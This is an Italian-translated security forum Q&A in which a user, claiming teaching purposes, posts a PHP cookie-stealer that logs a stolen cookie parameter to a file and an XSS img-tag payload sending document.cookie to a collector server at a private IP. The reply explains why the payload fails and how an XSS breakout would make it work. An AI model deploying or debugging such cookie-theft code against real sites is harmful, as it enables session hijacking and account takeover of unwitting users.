Cookie che ruba con il reindirizzamento

0

Sto tentando di rubare i cookie per scopi didattici e per questo ho installato un server malintenzionato in cui il mio sito Web malevolo sta eseguendo il furto di cookie di utenti e funziona quando visito come

link

Registra qualunque cosa detenga il parametro c, nel caso sopra document.cookie string.

Il semplice cookie stealer contiene le seguenti righe di codice

<?php
header('Location:https://google.com');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "\n\n");
?>

Il problema è quando utilizzo lo stesso link nell'attributo img tag src, non registra nulla nel file log.txt. Sto usando il seguente post sul sito vulnerabile;

<img src="http://192.168.8.102/cookiestealer.php?c="+document.cookieonerror="alert('Your cookie has been served')" />

Ma non registra nulla sul server. Tuttavia il file cambia mentre l'editor mi suggerisce di ricaricare ma non c'è nulla di scritto su di esso. Non esiste HTTPOnly = true per alcun cookie su questo sito.

Qualche suggerimento? THanks.

    
posta aneela 27.05.2018 - 12:22
fonte

1 risposta

3

Stai usando una routine javascript (document.cookie) in HTML senza entrare nel contesto javascript. In questi casi è utile esaminare la fonte della pagina generata, che spesso rende più facile la comprensione.

Per sfruttare il tuo ladro di cookie, è necessario un XSS sul sito della vittima. Nel caso più comune, ciò ti consente di uscire dal tag HTML e iniziare a scrivere javascript (ad es. ">

Come nota a margine, puoi sempre controllare i tuoi access logs per le richieste che arrivano nel tuo ladro di cookie - non c'è bisogno di un programma php separato per registrarli.

    
risposta data 27.05.2018 - 18:03
fonte

Leggi altre domande sui tag